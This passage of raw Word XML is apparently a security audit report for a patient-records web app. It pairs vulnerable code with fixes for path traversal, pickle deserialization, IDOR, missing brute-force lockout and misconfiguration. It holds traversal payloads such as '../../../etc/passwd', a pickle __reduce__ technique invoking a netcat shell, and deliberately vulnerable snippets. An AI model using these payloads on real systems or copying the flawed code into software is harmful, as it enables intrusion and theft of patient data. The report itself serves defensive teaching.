                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    target = os.path.join(REPORTS_DIR, filename)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    with open(target, "r") as f:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return f.read()</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 attacker requests filename = ../../../etc/passwd or ..\..\secure_portal.db. The file pointer traverses out of the reports directory, allowing attackers to download configuration files, database keys, and system secrets.</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secure_app/storage.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def get_secure_report_file(filename: str) -&gt; str:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # 1. Reject path separators</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if "/" in filename or "\\" in filename or ".." in filename:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        raise SecurityValidationError("Invalid filename syntax")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # 2. Canonical realpath verification</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    resolved = os.path.realpath(os.path.join(STORAGE_DIR, filename))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if not resolved.startswith(os.path.realpath(STORAGE_DIR) + os.sep):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        raise SecurityValidationError("Path traversal blocked")</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Canonicalization ensures all relative path components are fully resolved before testing boundary containment. Strict alphanumeric naming rules prevent directory traversal payloads at the gate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-07: Insecure Deserialization via Python Pickle Object Unmarshaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-502: Deserialization of Untrusted Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A08:2021 – Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>9.8 (Critical) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]</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B301:pickle (Use of unsafe pickle module)</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vulnerable_app/storage.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import pickle</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def load_backup_data(payload: bytes):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Unmarshals arbitrary Python bytecode - INSTANT RCE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return pickle.loads(payload)</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 attacker creates a malicious class implementing the __reduce__ magic method to invoke os.system('nc ...'). When pickle.loads() reconstructs the object, Python immediately executes the attacker's payload before validation.</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secure_app/storage.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import json, hmac, hashlib</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def secure_save_backup(data: dict) -&gt; str:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    serialized = json.dumps(data, sort_keys=True)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    sig = hmac.new(SECRET_KEY.encode(), serialized.encode(), hashlib.sha256).hexdigest()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return json.dumps({"payload": serialized, "signature": sig})</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def secure_load_backup(raw_blob: str) -&gt; dict:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Verifies signature before parsing; uses safe JSON only</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if not hmac.compare_digest(calculated_sig, provided_sig):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        raise SecurityValidationError("Tampered backup detected")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return json.loads(payload)</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Replacing bytecode serialization (pickle) with purely structured data formats (JSON) completely neutralizes arbitrary code execution. Adding HMAC cryptographic signing guarantees message authenticity and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-08: Broken Access Control &amp; Insecure Direct Object References (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-639: Authorization Bypass Through User-Controlled Key &amp; CWE-285: Improper Authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A01:2021 – Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6.5 (Medium) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]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Identified via Manual Code Review &amp; Automated Exploitation Harness</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vulnerable_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@app.route("/api/records/&lt;int:record_id&gt;")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def get_record(record_id):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Fetches record directly with ZERO role or user ownership verification</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    record = db.query(f"SELECT * FROM patient_records WHERE id = {record_id}")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return jsonify(record)</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Patient Alice logs in and inspects her record at /api/records/1. By changing the URL parameter to /api/records/2, she directly views Bob's confidential medical records, diagnostic history, and personal billing details.</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secure_app/auth.py &amp; secure_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@app.route("/api/records/&lt;int:record_id&gt;")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@login_required</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def get_record(current_user, record_id):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    record = get_patient_record_by_id(record_id)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Enforce role-based and object-level ownership checks</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if current_user["role"] in ["doctor", "admin"]:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return jsonify(record)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if current_user["role"] == "patient" and record["created_by"] == current_user["id"]:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return jsonify(record)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return jsonify({"error": "Forbidden"}), 403</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Authentication validates identity; authorization enforces access boundaries. Enforcing strict Role-Based Access Control (RBAC) and record ownership validation prevents horizontal and vertical privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-09: Missing Brute-Force Protection &amp; Account Lockout Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-307: Improper Restriction of Excessive Authentication Attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A07:2021 – Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7.5 (High) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]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Identified via Architectural Security Audit</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vulnerable_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@app.route("/api/login", methods=["POST"])</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def login():</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Allows unlimited automated login attempts with no throttling or lockout</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    user = authenticate(username, password)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if not user:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return jsonify({"error": "Invalid credentials"}), 401</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An attacker deploys automated credential-stuffing tools to submit thousands of common passwords against target physician accounts without encountering any delays, CAPTCHAs, or account lockouts until a password matches.</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secure_app/auth.py &amp; secure_app/database.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def authenticate_user(username: str, password_raw: str):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    user = get_user_by_username(username)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Check account lockout status</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if user["locked_until"] &gt; time.time():</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        raise AccountLockedError("Account temporarily locked due to failed attempts")</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if not verify_password(user["password_hash"], password_raw):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        record_failed_attempt(user["id"])  # Locks account after 5 attempts for 300 seconds</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">        return None</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    reset_failed_attempts(user["id"])</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Enforcing account lockout after 5 consecutive failed attempts alongside exponential authentication delays neutralizes automated brute-force attacks and complies with NIST SP 800-63B guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>VULN-10: Security Misconfigurations &amp; Missing HTTP Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE Identifier: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CWE-16: Configuration &amp; CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Taxonomy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A05:2021 – Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5.3 (Medium) [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Static Analysis Finding: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>B201:flask_debug_true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable Implementation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
